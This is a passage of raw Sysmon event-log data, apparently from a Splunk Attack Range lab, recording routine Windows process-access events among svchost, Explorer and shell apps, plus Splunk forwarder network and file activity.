4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.
dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:29.606{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51014-false10.0.1.12-8000- 23542300x80000000000000001048370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:37.583{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6F01D837678B0C87A599CF89913EA3D,SHA256=958442FE8DCAD9EDF87CA216980772A95616946783864C6F6BFF0615998AF568,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807476Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:36.204{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57256-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807475Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:37.055{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8B55FD09332DF30D991931732C038F9,SHA256=EFDCD46DBFFC9A3D766FDDF600BBFDDE71D13C24B7C5A9552B1D42F8C2812467,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:38.597{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D81E3151D2C24BBC849E62C9E091DF5,SHA256=5334F987E95024835B8FADD4E6B771A16245E3D6304B2855928740B636F662C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807477Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:38.071{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6099419A32773A07A1748D02957DAD26,SHA256=8A41FDFD10FA335B9B0BF7683A89FA480321AAA3377F4188789F84A5E16C31DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:38.528{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=71D82202B724CDA44EFB88BAF42920E9,SHA256=887A9BAD1FCF2D53D022E53403F1194101151FEED7F2D3925ECD9DF229FFAF0D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.996{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Window
s\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.996{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:39.980{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3